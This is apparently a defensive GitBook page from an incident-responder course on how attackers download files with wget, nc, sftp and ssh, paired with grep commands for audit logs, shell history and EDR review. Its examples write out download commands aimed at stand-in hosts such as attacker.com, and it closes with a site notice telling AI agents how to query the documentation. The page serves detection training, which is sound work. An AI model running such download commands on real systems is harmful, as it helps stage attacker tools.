# File Download ## File Download in nix Systems: Tools and Detection Attackers frequently use standard \*nix utilities to download malicious tools or exfiltrate sensitive files. Below are common methods and detection strategies for identifying unauthorized file downloads. *** ## **Key Commands for File Download** ### **1. wget Command** **Purpose**: Download files from web servers. **Example**: ```bash URL=http://attacker.com/file_to_get LFILE=file_to_save wget $URL -O $LFILE ``` **Detection**: * Focus on the **`-O`** parameter, which specifies the output file. * Verify if the destination (IP/domain) is trusted. **Detection Methods**: * **Audit Logs**: ```bash cat /var/log/audit/audit.log | grep "wget" | grep "\-O" ``` * **Command History**: ```bash history | grep "wget" | grep "\-O" cat ~/.bash_history | grep "wget" | grep "\-O" ``` * **EDR/XDR Logs**: Inspect **wget** processes and associated network traffic for unauthorized connections. ### **2. nc (Netcat) Command** **Purpose**: Transfer files using TCP or UDP. **Example**: *On the remote system*: ```bash nc target.com 12345 < "file_to_send" ``` *On the target system*: ```bash LPORT=12345 LFILE=file_to_save nc -l -p $LPORT > "$LFILE" ``` **Detection**: * Look for **`-l`** (listen mode) and **`>`** operator to detect incoming file streams. **Detection Methods**: * **Audit Logs**: ```bash cat /var/log/audit/audit.log | grep "nc" | grep "\-l" ``` * **Command History**: ```bash history | grep "nc" | grep "\-l" cat ~/.bash_history | grep "nc" | grep "\-l" ``` * **EDR/XDR Logs**: Analyze **nc** processes and network activity for unauthorized file transfers. ### **3. sftp Command** **Purpose**: Secure file transfer over SSH. **Example**: ```bash RHOST=user@attacker.com sftp $RHOST get file_to_get file_to_save ``` **Detection**: * Focus on **get** operations for file downloads. * Verify the legitimacy of remote destinations. **Detection Methods**: * **Audit Logs**: ```bash cat /var/log/audit/audit.log | grep "sftp" ``` * **Command History**: ```bash history | grep "sftp" cat ~/.bash_history | grep "sftp" ``` * **EDR/XDR Logs**: Investigate **sftp** processes and network connections. ### **4. ssh Command** **Purpose**: Execute remote commands, including file transfers. **Example**: ```bash HOST=user@attacker.com RPATH=file_to_get LPATH=file_to_save ssh $HOST "cat $RPATH" > $LPATH ``` **Detection**: * Monitor the **`>`** operator in conjunction with remote file viewing commands like **cat**. **Detection Methods**: * **Audit Logs**: ```bash cat /var/log/audit/audit.log | grep "ssh" ``` * **Command History**: ```bash history | grep "ssh" cat ~/.bash_history | grep "ssh" ``` * **EDR/XDR Logs**: Examine **ssh** process events and parameters for unauthorized file retrievals. *** ## **General Detection Strategies** ### **1. Monitor Known Tools** * Regularly log and review commands like **wget**, **nc**, **sftp**, and **ssh**. * Pay close attention to connections with external or suspicious domains. ### **2. Check Network Traffic** * Analyze outbound connections, especially to untrusted IPs or domains. * Use network monitoring tools to flag uncommon destinations or large data transfers. ### **3. Audit Logs** * Regularly review **`/var/log/audit/audit.log`** for download-related commands. ### **4. Command History** * Inspect history files for any download-related activities. ```bash history | grep [command] cat ~/.bash_history | grep [command] ``` ### **5. EDR/XDR Telemetry** * Utilize endpoint detection tools to: * Correlate process events with network connections. * Detect and flag unauthorized file transfer patterns. *** ## **Key Points** While utilities like **wget**, **nc**, **sftp**, and **ssh** serve legitimate purposes, they are often exploited for malicious file downloads. **Continuous monitoring**, combined with thorough log analysis and EDR/XDR telemetry, is essential to identify and mitigate these threats effectively. By proactively implementing these strategies, defenders can strengthen their security posture against unauthorized file transfer activities. --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://karim-ashraf.gitbook.io/karim_ashraf_space/writeups/lets-defend/incident-responder-path/gtfobins/file-download.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.